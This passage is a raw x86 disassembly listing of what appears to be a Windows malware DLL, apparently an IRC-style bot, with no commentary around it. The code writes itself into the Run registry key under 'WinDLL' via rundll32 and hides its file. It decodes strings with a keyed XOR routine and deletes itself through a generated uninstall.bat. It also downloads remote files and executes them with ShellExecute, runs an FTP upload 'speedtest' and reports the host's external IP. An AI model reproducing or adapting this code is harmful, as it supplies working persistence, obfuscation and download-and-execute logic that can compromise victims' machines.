call ds:_snprintf ; _snprintf
add esp, 10h
push offset dword_1002C5E8
lea edx, [ebp+Buffer]
push edx
push offset aSS_5 ; "%s\\%s"
push 100h ; Count
lea eax, [ebp+FileName]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 14h
lea ecx, [ebp+FileName]
push ecx
push offset aRundll32_exeSS ; "rundll32.exe %s,start"
push 100h ; Count
lea edx, [ebp+Data]
push edx ; Dest
call ds:_snprintf ; _snprintf
add esp, 10h
push 0 ; lpdwDisposition
lea eax, [ebp+hKey]
push eax ; phkResult
push 0 ; lpSecurityAttributes
push 0F003Fh ; samDesired
push 0 ; dwOptions
push 0 ; lpClass
push 0 ; Reserved
push offset SubKey ; "Software\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h ; hKey
call ds:RegCreateKeyExA ; RegCreateKeyExA
lea ecx, [ebp+Data]
push ecx ; Str
call strlen ; strlen
add esp, 4
push eax ; cbData
lea edx, [ebp+Data]
push edx ; lpData
push 1 ; dwType
push 0 ; Reserved
lea eax, [ebp+ValueName]
push eax ; lpValueName
mov ecx, [ebp+hKey]
push ecx ; hKey
call ds:RegSetValueExA ; RegSetValueExA
mov edx, [ebp+hKey]
push edx ; hKey
call ds:RegCloseKey ; RegCloseKey
push 6 ; dwFileAttributes
lea eax, [ebp+FileName]
push eax ; lpFileName
call ds:SetFileAttributesA ; SetFileAttributesA
mov esp, ebp
pop ebp
retn
sub_10004DB1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_10004EA7 proc near ; CODE XREF: sub_10004CE4+C4�p
; sub_10005380+1B0�p ...
hKey = dword ptr -88Ch
ValueName = byte ptr -888h
hObject = dword ptr -808h
var_804 = byte ptr -804h
Buffer = byte ptr -704h
NumberOfBytesWritten= dword ptr -604h
File = byte ptr -600h
Str = byte ptr -500h
FileName = byte ptr -100h
push ebp
mov ebp, esp
sub esp, 88Ch
push 100h ; uSize
lea eax, [ebp+Buffer]
push eax ; lpBuffer
call ds:GetSystemDirectoryA ; GetSystemDirectoryA
lea ecx, [ebp+var_804]
push ecx ; lpBuffer
push 100h ; nBufferLength
call ds:GetTempPathA ; GetTempPathA
push offset dword_1002C5E8
lea edx, [ebp+Buffer]
push edx
push offset aSS_6 ; "%s\\%s"
push 100h ; Count
lea eax, [ebp+FileName]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 14h
lea ecx, [ebp+var_804]
push ecx
push offset aSuninstall_bat ; "%suninstall.bat"
push 100h ; Count
lea edx, [ebp+File]
push edx ; Dest
call ds:_snprintf ; _snprintf
add esp, 10h
push offset ExistingFileName ; Str2
lea eax, [ebp+FileName]
push eax ; Str1
call ds:_stricmp ; _stricmp
add esp, 8
test eax, eax
jnz short loc_10004F9F
push offset dword_1002C5E8
push offset aWindllS_0 ; "WinDLL (%s)"
push 80h ; Count
lea ecx, [ebp+ValueName]
push ecx ; Dest
call ds:_snprintf ; _snprintf
add esp, 10h
push 0 ; lpdwDisposition
lea edx, [ebp+hKey]
push edx ; phkResult
push 0 ; lpSecurityAttributes
push 0F003Fh ; samDesired
push 0 ; dwOptions
push 0 ; lpClass
push 0 ; Reserved
push offset aSoftwareMicr_0 ; "Software\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h ; hKey
call ds:RegCreateKeyExA ; RegCreateKeyExA
lea eax, [ebp+ValueName]
push eax ; lpValueName
mov ecx, [ebp+hKey]
push ecx ; hKey
call ds:RegDeleteValueA ; RegDeleteValueA
push 80h ; dwFileAttributes
lea edx, [ebp+FileName]
push edx ; lpFileName
call ds:SetFileAttributesA ; SetFileAttributesA
loc_10004F9F: ; CODE XREF: sub_10004EA7+8B�j
lea eax, [ebp+File]
push eax
push offset ExistingFileName
push offset ExistingFileName
push offset a@echoOff1DelSI ; "@echo off\r\n:1\r\ndel \"%s\"\r\nif exist \"%s\" "...
push 400h ; Count
lea ecx, [ebp+Str]
push ecx ; Dest
call ds:_snprintf ; _snprintf
add esp, 18h
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 0 ; dwShareMode
push 40000000h ; dwDesiredAccess
lea edx, [ebp+File]
push edx ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hObject], eax
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
lea ecx, [ebp+Str]
push ecx ; Str
call strlen ; strlen
add esp, 4
push eax ; nNumberOfBytesToWrite
lea edx, [ebp+Str]
push edx ; lpBuffer
mov eax, [ebp+hObject]
push eax ; hFile
call ds:WriteFile ; WriteFile
mov ecx, [ebp+hObject]
push ecx ; hObject
call ds:CloseHandle ; CloseHandle
push 0 ; nShowCmd
push 0 ; lpDirectory
push 0 ; lpParameters
lea edx, [ebp+File]
push edx ; lpFile
push offset aOpen_1 ; "open"
push 0 ; hwnd
call ds:ShellExecuteA ; ShellExecuteA
push 0 ; Code
call ds:exit ; exit
sub_10004EA7 endp
; ---------------------------------------------------------------------------
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000504C proc near ; CODE XREF: start+FD�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push offset a7xoaredq6lsnv6 ; "7XoarEdQ6LsNv624U2PBS4Eyx7S5WzhL7gw3am4"...
push offset unk_10011AD0 ; int
push 80h ; int
push offset Name ; int
call sub_10005191
add esp, 10h
push offset a7xoaredq6lsnv6 ; "7XoarEdQ6LsNv624U2PBS4Eyx7S5WzhL7gw3am4"...
push offset dword_1000CA30 ; int
push 80h ; int
push offset Str ; int
call sub_10005191
add esp, 10h
push offset a7xoaredq6lsnv6 ; "7XoarEdQ6LsNv624U2PBS4Eyx7S5WzhL7gw3am4"...
push offset dword_1000CAB0 ; int
push 80h ; int
push offset byte_10012C44 ; int
call sub_10005191
add esp, 10h
push offset a7xoaredq6lsnv6 ; "7XoarEdQ6LsNv624U2PBS4Eyx7S5WzhL7gw3am4"...
push offset aZuvj ; "\a:zuvj|:"
push 80h ; int
push offset byte_1002C868 ; int
call sub_10005191
add esp, 10h
push offset a7xoaredq6lsnv6 ; "7XoarEdQ6LsNv624U2PBS4Eyx7S5WzhL7gw3am4"...
push offset dword_1000CBB0 ; int
push 80h ; int
push offset dword_1002C768 ; int
call sub_10005191
add esp, 10h
push offset a7xoaredq6lsnv6 ; "7XoarEdQ6LsNv624U2PBS4Eyx7S5WzhL7gw3am4"...
push offset dword_1000CC30 ; int
push 80h ; int
push offset dword_10012BC4 ; int
call sub_10005191
add esp, 10h
push offset a7xoaredq6lsnv6 ; "7XoarEdQ6LsNv624U2PBS4Eyx7S5WzhL7gw3am4"...
push offset aZuvj_0 ; "\b:zuvj|:("
push 80h ; int
push offset dword_1002C7E8 ; int
call sub_10005191
add esp, 10h
push offset a7xoaredq6lsnv6 ; "7XoarEdQ6LsNv624U2PBS4Eyx7S5WzhL7gw3am4"...
push offset aNpwfju7A ; "\vnpwFju+7|a|"
push 80h ; int
push offset dword_1002C5E8 ; int
call sub_10005191
add esp, 10h
mov [ebp+var_4], 0
jmp short loc_10005142
; ---------------------------------------------------------------------------
loc_10005139: ; CODE XREF: sub_1000504C+132�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_10005142: ; CODE XREF: sub_1000504C+EB�j
mov ecx, [ebp+var_4]
shl ecx, 7
movsx edx, ds:byte_1000C230[ecx]
test edx, edx
jz short loc_10005180
push offset a7xoaredq6lsnv6 ; "7XoarEdQ6LsNv624U2PBS4Eyx7S5WzhL7gw3am4"...
mov eax, [ebp+var_4]
shl eax, 7
add eax, offset byte_1000C230
push eax ; int
push 80h ; int
mov ecx, [ebp+var_4]
shl ecx, 7
add ecx, offset byte_1002C8E8
push ecx ; int
call sub_10005191
add esp, 10h
jmp short loc_10005139
; ---------------------------------------------------------------------------
loc_10005180: ; CODE XREF: sub_1000504C+105�j
mov edx, [ebp+var_4]
shl edx, 7
mov byte_1002C8E8[edx], 0
mov esp, ebp
pop ebp
retn
sub_1000504C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10005191(int,int,int,char *Str)
sub_10005191 proc near ; CODE XREF: sub_1000504C+18�p
; sub_1000504C+34�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
Str = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+Str]
push eax ; Str
call strlen ; strlen
add esp, 4
mov [ebp+var_4], eax
mov ecx, [ebp+arg_8]
mov dl, [ecx]
mov byte ptr [ebp+var_10], dl
mov [ebp+var_8], 0
jmp short loc_100051C0
; ---------------------------------------------------------------------------
loc_100051B7: ; CODE XREF: sub_10005191+4E�j
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
loc_100051C0: ; CODE XREF: sub_10005191+24�j
mov ecx, [ebp+var_10]
and ecx, 0FFh
cmp [ebp+var_8], ecx
jge short loc_100051E1
mov edx, [ebp+arg_0]
add edx, [ebp+var_8]
mov eax, [ebp+arg_8]
add eax, [ebp+var_8]
mov cl, [eax+1]
mov [edx], cl
jmp short loc_100051B7
; ---------------------------------------------------------------------------
loc_100051E1: ; CODE XREF: sub_10005191+3B�j
mov [ebp+var_14], 0
jmp short loc_100051F3
; ---------------------------------------------------------------------------
loc_100051EA: ; CODE XREF: sub_10005191:loc_1000523F�j
mov edx, [ebp+var_14]
add edx, 1
mov [ebp+var_14], edx
loc_100051F3: ; CODE XREF: sub_10005191+57�j
mov eax, [ebp+var_14]
cmp eax, [ebp+var_4]
jge short loc_10005241
mov [ebp+var_C], 0
jmp short loc_1000520D
; ---------------------------------------------------------------------------
loc_10005204: ; CODE XREF: sub_10005191+AC�j
mov ecx, [ebp+var_C]
add ecx, 1
mov [ebp+var_C], ecx
loc_1000520D: ; CODE XREF: sub_10005191+71�j
mov edx, [ebp+var_10]
and edx, 0FFh
cmp [ebp+var_C], edx
jge short loc_1000523F
mov eax, [ebp+var_C]
cmp eax, [ebp+arg_4]
jl short loc_10005225
jmp short loc_1000523F
; ---------------------------------------------------------------------------
loc_10005225: ; CODE XREF: sub_10005191+90�j
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_C]
mov edx, [ebp+Str]
add edx, [ebp+var_14]
mov al, [ecx]
xor al, [edx]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_C]
mov [ecx], al
jmp short loc_10005204
; ---------------------------------------------------------------------------
loc_1000523F: ; CODE XREF: sub_10005191+88�j
; sub_10005191+92�j
jmp short loc_100051EA
; ---------------------------------------------------------------------------
loc_10005241: ; CODE XREF: sub_10005191+68�j
mov edx, [ebp+var_10]
and edx, 0FFh
mov eax, [ebp+arg_0]
mov byte ptr [eax+edx], 0
mov esp, ebp
pop ebp
retn
sub_10005191 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+14h]
push eax
call strlen ; strlen
add esp, 4
mov [ebp-4], eax
mov ecx, [ebp+10h]
push ecx
call strlen ; strlen
add esp, 4
mov [ebp-0Ch], al
mov edx, [ebp+8]
mov al, [ebp-0Ch]
mov [edx], al
mov ecx, [ebp+0Ch]
push ecx
mov edx, [ebp+10h]
push edx
mov eax, [ebp+8]
add eax, 1
push eax
call ds:strncpy ; strncpy
add esp, 0Ch
mov dword ptr [ebp-10h], 0
jmp short loc_100052AB
; ---------------------------------------------------------------------------
loc_100052A2: ; CODE XREF: .text:loc_100052F7�j
mov ecx, [ebp-10h]
add ecx, 1
mov [ebp-10h], ecx
loc_100052AB: ; CODE XREF: .text:100052A0�j
mov edx, [ebp-10h]
cmp edx, [ebp-4]
jge short loc_100052F9
mov dword ptr [ebp-8], 1
jmp short loc_100052C5
; ---------------------------------------------------------------------------
loc_100052BC: ; CODE XREF: .text:100052F5�j
mov eax, [ebp-8]
add eax, 1
mov [ebp-8], eax
loc_100052C5: ; CODE XREF: .text:100052BA�j
mov ecx, [ebp-0Ch]
and ecx, 0FFh
cmp [ebp-8], ecx
jg short loc_100052F7
mov edx, [ebp-8]
cmp edx, [ebp+0Ch]
jl short loc_100052DD
jmp short loc_100052F7
; ---------------------------------------------------------------------------
loc_100052DD: ; CODE XREF: .text:100052D9�j
mov eax, [ebp+8]
add eax, [ebp-8]
mov ecx, [ebp+14h]
add ecx, [ebp-10h]
mov dl, [eax]
xor dl, [ecx]
mov eax, [ebp+8]
add eax, [ebp-8]
mov [eax], dl
jmp short loc_100052BC
; ---------------------------------------------------------------------------
loc_100052F7: ; CODE XREF: .text:100052D1�j
; .text:100052DB�j
jmp short loc_100052A2
; ---------------------------------------------------------------------------
loc_100052F9: ; CODE XREF: .text:100052B1�j
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100052FD proc near ; DATA XREF: .data:1000E01C�o
push ebp
mov ebp, esp
call sub_1000530C
call sub_1000531C
pop ebp
retn
sub_100052FD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000530C proc near ; CODE XREF: sub_100052FD+3�p
push ebp
mov ebp, esp
mov ecx, offset byte_10012DC5
call ds:??0Init@ios_base@std@@QAE@XZ ; std::ios_base::Init::Init(void)
pop ebp
retn
sub_1000530C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000531C proc near ; CODE XREF: sub_100052FD+8�p
push ebp
mov ebp, esp
push offset sub_1000532E ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_1000531C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_1000532E()
sub_1000532E proc near ; DATA XREF: sub_1000531C+3�o
push ebp
mov ebp, esp
mov ecx, offset byte_10012DC5
call ds:??1Init@ios_base@std@@QAE@XZ ; std::ios_base::Init::~Init(void)
pop ebp
retn
sub_1000532E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000533E proc near ; DATA XREF: .data:1000E020�o
push ebp
mov ebp, esp
call sub_1000534D
call sub_1000535D
pop ebp
retn
sub_1000533E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000534D proc near ; CODE XREF: sub_1000533E+3�p
push ebp
mov ebp, esp
mov ecx, offset byte_10012DC4
call ds:??0_Winit@std@@QAE@XZ ; std::_Winit::_Winit(void)
pop ebp
retn
sub_1000534D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000535D proc near ; CODE XREF: sub_1000533E+8�p
push ebp
mov ebp, esp
push offset sub_1000536F ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_1000535D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_1000536F()
sub_1000536F proc near ; DATA XREF: sub_1000535D+3�o
push ebp
mov ebp, esp
mov ecx, offset byte_10012DC4
call ds:??1_Winit@std@@QAE@XZ ; std::_Winit::~_Winit(void)
pop ebp
retn
sub_1000536F endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10005380 proc near ; DATA XREF: sub_10007424+100B�o
; sub_10007424+161D�o
Parameters = byte ptr -1320h
hObject = dword ptr -1220h
Buffer = byte ptr -121Ch
var_21C = dword ptr -21Ch
NumberOfBytesWritten= dword ptr -218h
var_214 = dword ptr -214h
nNumberOfBytesToWrite= dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
File = byte ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1320h
call __alloca_probe
push esi
push edi
mov esi, [ebp+arg_0]
mov ecx, 82h
lea edi, [ebp+var_20C]
rep movsd
mov eax, [ebp+arg_0]
mov [ebp+var_21C], eax
push 0
push 0
push 0
push 0
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible)"
call ds:InternetOpenA ; InternetOpenA
mov [ebp+var_4], eax
push 0
push 0
push 0
push 0
lea ecx, [ebp+var_208]
push ecx
mov edx, [ebp+var_4]
push edx
call ds:InternetOpenUrlA ; InternetOpenUrlA
mov [ebp+var_214], eax
mov eax, [ebp+var_21C]
mov byte ptr [eax+207h], 1
cmp [ebp+var_214], 0
jz loc_1000555E
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 0 ; dwShareMode
push 40000000h ; dwDesiredAccess
lea ecx, [ebp+File]
push ecx ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hObject], eax
cmp [ebp+hObject], 0FFFFFFFFh
jnz short loc_1000543E
push 1
mov edx, [ebp+var_20C]
push edx
call sub_1000AB26
add esp, 8
push 0
call ds:_endthreadex ; _endthreadex
add esp, 4
loc_1000543E: ; CODE XREF: sub_10005380+A0�j
; sub_10005380+109�j
lea eax, [ebp+nNumberOfBytesToWrite]
push eax
push 1000h
lea ecx, [ebp+Buffer]
push ecx
mov edx, [ebp+var_214]
push edx
call ds:InternetReadFile ; InternetReadFile
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
mov ecx, [ebp+nNumberOfBytesToWrite]
push ecx ; nNumberOfBytesToWrite
lea edx, [ebp+Buffer]
push edx ; lpBuffer
mov eax, [ebp+hObject]
push eax ; hFile
call ds:WriteFile ; WriteFile
cmp [ebp+nNumberOfBytesToWrite], 0
ja short loc_1000543E
mov ecx, [ebp+hObject]
push ecx ; hObject
call ds:CloseHandle ; CloseHandle
mov edx, [ebp+var_214]
push edx
call ds:InternetCloseHandle ; InternetCloseHandle
mov eax, [ebp+var_4]
push eax
call ds:InternetCloseHandle ; InternetCloseHandle
mov ecx, [ebp-7]
and ecx, 0FFh
test ecx, ecx
jz short loc_10005537
mov edx, [ebp+var_8]
and edx, 0FFh
test edx, edx
jz short loc_100054E5
push 0 ; nShowCmd
push 0 ; lpDirectory
push 0 ; lpParameters
lea eax, [ebp+File]
push eax ; lpFile
push offset aOpen_2 ; "open"
push 0 ; hwnd
call ds:ShellExecuteA ; ShellExecuteA
jmp short loc_10005523
; ---------------------------------------------------------------------------
loc_100054E5: ; CODE XREF: sub_10005380+147�j
lea ecx, [ebp+File]
push ecx
push offset aSStart_0 ; "%s,start"
push 100h ; Count
lea edx, [ebp+Parameters]
push edx ; Dest
call ds:_snprintf ; _snprintf
add esp, 10h
push 0 ; nShowCmd
push 0 ; lpDirectory
lea eax, [ebp+Parameters]
push eax ; lpParameters
push offset aRundll32_exe_0 ; "rundll32.exe"
push offset aOpen_3 ; "open"
push 0 ; hwnd
call ds:ShellExecuteA ; ShellExecuteA
loc_10005523: ; CODE XREF: sub_10005380+163�j
push offset aQuit ; "QUIT"
call sub_10007293
add esp, 4
call sub_10004EA7
; ---------------------------------------------------------------------------
jmp short loc_1000555E
; ---------------------------------------------------------------------------
loc_10005537: ; CODE XREF: sub_10005380+13A�j
mov ecx, [ebp+var_8+2]
and ecx, 0FFh
test ecx, ecx
jz short loc_1000555E
push 5 ; nShowCmd
push 0 ; lpDirectory
push 0 ; lpParameters
lea edx, [ebp+File]
push edx ; lpFile
push offset aOpen_4 ; "open"
push 0 ; hwnd
call ds:ShellExecuteA ; ShellExecuteA
loc_1000555E: ; CODE XREF: sub_10005380+71�j
; sub_10005380+1B5�j ...
push 1
mov eax, [ebp+var_20C]
push eax
call sub_1000AB26
add esp, 8
push 0
call ds:_endthreadex ; _endthreadex
add esp, 4
xor eax, eax
pop edi
pop esi
mov esp, ebp
pop ebp
retn 4
sub_10005380 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10005584 proc near ; DATA XREF: sub_10007424+EBC�o
var_1180 = dword ptr -1180h
var_117C = dword ptr -117Ch
var_1178 = dword ptr -1178h
var_1174 = dword ptr -1174h
var_1170 = dword ptr -1170h
var_116C = byte ptr -116Ch
var_1168 = dword ptr -1168h
var_1164 = dword ptr -1164h
var_1160 = dword ptr -1160h
var_115C = byte ptr -115Ch
var_105C = dword ptr -105Ch
var_1048 = dword ptr -1048h
var_1038 = dword ptr -1038h
var_1034 = dword ptr -1034h
var_1030 = word ptr -1030h
Memory = dword ptr -102Ch
var_1028 = dword ptr -1028h
var_1024 = dword ptr -1024h
var_1020 = dword ptr -1020h
Dst = byte ptr -100Ch
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1180h
call __alloca_probe
push esi
push edi
mov esi, [ebp+arg_0]
mov ecx, 47h
lea edi, [ebp+var_1164]
rep movsd
mov eax, [ebp+arg_0]
mov [ebp+var_1168], eax
push 0
push 0
push 0
push 0
push offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible)"
call ds:InternetOpenA ; InternetOpenA
mov [ebp+var_C], eax
mov ecx, [ebp+var_1168]
mov byte ptr [ecx+118h], 1
push 80h ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+Memory], eax
mov [ebp+var_1028], 80h
push 80h ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+var_1024], eax
mov [ebp+var_1020], 80h
push 80h ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+var_1038], eax
mov [ebp+var_1034], 80h
mov [ebp+var_1048], 3Ch
lea edx, [ebp+var_1048]
push edx
push 0
push 0
lea eax, [ebp+var_115C]
push eax
call ds:InternetCrackUrlA ; InternetCrackUrlA
push 0
push 0
push 1
mov ecx, [ebp+var_1024]
push ecx
mov edx, [ebp+Memory]
push edx
mov ax, [ebp+var_1030]
push eax
mov ecx, [ebp+var_1038]
push ecx
mov edx, [ebp+var_C]
push edx
call ds:InternetConnectA ; InternetConnectA
mov [ebp+var_117C], eax
cmp [ebp+var_117C], 0
jz loc_1000579A
push 0
push 2
push 40000000h
push offset aSpeed_test ; "speed.test"
mov eax, [ebp+var_117C]
push eax
call ds:FtpOpenFileA ; FtpOpenFileA
mov [ebp+var_1174], eax
cmp [ebp+var_1174], 0
jz loc_1000579A
push 1000h ; Size
push 41h ; Val
lea ecx, [ebp+Dst]
push ecx ; Dst
call memset ; memset
add esp, 0Ch
call ds:GetTickCount ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov [ebp+var_1170], eax
mov [ebp+var_1178], 0
jmp short loc_100056FF
; ---------------------------------------------------------------------------
loc_100056F0: ; CODE XREF: sub_10005584+1D0�j
mov edx, [ebp+var_1178]
add edx, 1
mov [ebp+var_1178], edx
loc_100056FF: ; CODE XREF: sub_10005584+16A�j
mov eax, [ebp+var_1160]
shl eax, 0Ah
cdq
and edx, 0FFFh
add eax, edx
sar eax, 0Ch
cmp [ebp+var_1178], eax
jge short loc_10005756
lea eax, [ebp+var_116C]
push eax
push 1000h
lea ecx, [ebp+Dst]
push ecx
mov edx, [ebp+var_1174]
push edx
call ds:InternetWriteFile ; InternetWriteFile
call ds:GetTickCount ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
sub eax, [ebp+var_1170]
mov [ebp+var_4], eax
jmp short loc_100056F0
; ---------------------------------------------------------------------------
loc_10005756: ; CODE XREF: sub_10005584+196�j
cmp [ebp+var_4], 0
jz short loc_10005767
mov edx, [ebp+var_4]
mov [ebp+var_1180], edx
jmp short loc_10005771
; ---------------------------------------------------------------------------
loc_10005767: ; CODE XREF: sub_10005584+1D6�j
mov [ebp+var_1180], 1
loc_10005771: ; CODE XREF: sub_10005584+1E1�j
mov eax, [ebp+var_1160]
xor edx, edx
div [ebp+var_1180]
mov dword ptr [ebp+var_8], eax
mov eax, dword ptr [ebp+var_8]
push eax ; char
push offset aSpeedtestCompl ; "speedtest complete (upload speed: %luKB"...
lea ecx, [ebp+var_105C]
push ecx ; int
call sub_10007303
add esp, 0Ch
loc_1000579A: ; CODE XREF: sub_10005584+101�j
; sub_10005584+12F�j
mov edx, [ebp+var_1174]
push edx
call ds:InternetCloseHandle ; InternetCloseHandle
mov eax, [ebp+var_117C]
push eax
call ds:InternetCloseHandle ; InternetCloseHandle
mov ecx, [ebp+var_C]
push ecx
call ds:InternetCloseHandle ; InternetCloseHandle
mov edx, [ebp+Memory]
push edx ; Memory
call ds:free ; free
add esp, 4
mov eax, [ebp+var_1024]
push eax ; Memory
call ds:free ; free
add esp, 4
mov ecx, [ebp+var_1038]
push ecx ; Memory
call ds:free ; free
add esp, 4
push 1
mov edx, [ebp+var_1164]
push edx
call sub_1000AB26
add esp, 8
push 0
call ds:_endthreadex ; _endthreadex
add esp, 4
xor eax, eax
pop edi
pop esi
mov esp, ebp
pop ebp
retn 4
sub_10005584 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10005814 proc near ; DATA XREF: .data:1000E024�o
push ebp
mov ebp, esp
call sub_10005823
call sub_10005833
pop ebp
retn
sub_10005814 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10005823 proc near ; CODE XREF: sub_10005814+3�p
push ebp
mov ebp, esp
mov ecx, offset byte_1002D0F9
call ds:??0Init@ios_base@std@@QAE@XZ ; std::ios_base::Init::Init(void)
pop ebp
retn
sub_10005823 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10005833 proc near ; CODE XREF: sub_10005814+8�p
push ebp
mov ebp, esp
push offset sub_10005845 ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_10005833 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_10005845()
sub_10005845 proc near ; DATA XREF: sub_10005833+3�o
push ebp
mov ebp, esp
mov ecx, offset byte_1002D0F9
call ds:??1Init@ios_base@std@@QAE@XZ ; std::ios_base::Init::~Init(void)
pop ebp
retn
sub_10005845 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10005855 proc near ; DATA XREF: .data:1000E028�o
push ebp
mov ebp, esp
call sub_10005864
call sub_10005874
pop ebp
retn
sub_10005855 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10005864 proc near ; CODE XREF: sub_10005855+3�p
push ebp
mov ebp, esp
mov ecx, offset byte_1002D0F8
call ds:??0_Winit@std@@QAE@XZ ; std::_Winit::_Winit(void)
pop ebp
retn
sub_10005864 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10005874 proc near ; CODE XREF: sub_10005855+8�p
push ebp
mov ebp, esp
push offset sub_10005886 ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_10005874 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_10005886()
sub_10005886 proc near ; DATA XREF: sub_10005874+3�o
push ebp
mov ebp, esp
mov ecx, offset byte_1002D0F8
call ds:??1_Winit@std@@QAE@XZ ; std::_Winit::~_Winit(void)
pop ebp
retn
sub_10005886 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 420h
push edi
mov dword ptr [ebp-30Ch], 0
mov byte ptr [ebp-420h], 0
xor eax, eax
mov [ebp-41Fh], eax
mov [ebp-41Bh], eax
mov [ebp-417h], eax
mov [ebp-413h], ax
mov [ebp-411h], al
mov byte ptr [ebp-304h], 0
mov ecx, 40h
xor eax, eax
lea edi, [ebp-303h]
rep stosd
stosw
stosb
mov byte ptr [ebp-410h], 0
mov ecx, 40h
xor eax, eax
lea edi, [ebp-40Fh]
rep stosd
stosw
stosb
mov byte ptr [ebp-200h], 0
mov ecx, 7Fh
xor eax, eax
lea edi, [ebp-1FFh]
rep stosd
stosw
stosb
cmp dword ptr [ebp+0Ch], 0
jnz short loc_10005934
xor eax, eax
jmp loc_100059E7
; ---------------------------------------------------------------------------
loc_10005934: ; CODE XREF: .text:1000592B�j
lea ecx, [ebp-304h]
push ecx
push 103h
call ds:GetTempPathA ; GetTempPathA
lea edx, [ebp-410h]
push edx
push 0
push offset aTemp ; "Temp"
lea eax, [ebp-304h]
push eax
call ds:GetTempFileNameA ; GetTempFileNameA
xor ecx, ecx
test ecx, ecx
jz short loc_100059E2
push 0
push 80h
push 3
push 0
push 1
push 80000000h
lea edx, [ebp-410h]
push edx
call ds:CreateFileA ; CreateFileA
mov [ebp-308h], eax
cmp dword ptr [ebp-308h], 0FFFFFFFFh
jz short loc_100059E2
push 0
lea eax, [ebp-30Ch]
push eax
push 0Fh
lea ecx, [ebp-420h]
push ecx
mov edx, [ebp-308h]
push edx
call ds:ReadFile ; ReadFile
lea eax, [ebp-420h]
push eax
push offset aMainExternalIp ; "Main-> External IP: %s"
push 1FFh
lea ecx, [ebp-200h]
push ecx
call ds:_snprintf ; _snprintf
add esp, 10h
mov edx, [ebp-308h]
push edx
call ds:CloseHandle ; CloseHandle
loc_100059E2: ; CODE XREF: .text:10005965�j
; .text:10005993�j
mov eax, 1
loc_100059E7: ; CODE XREF: .text:1000592F�j
pop edi
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100059EC proc near ; DATA XREF: .data:1000E02C�o
push ebp
mov ebp, esp
call sub_100059FB
call sub_10005A0B
pop ebp
retn
sub_100059EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100059FB proc near ; CODE XREF: sub_100059EC+3�p
push ebp
mov ebp, esp
mov ecx, offset byte_1002D101
call ds:??0Init@ios_base@std@@QAE@XZ ; std::ios_base::Init::Init(void)
pop ebp
retn
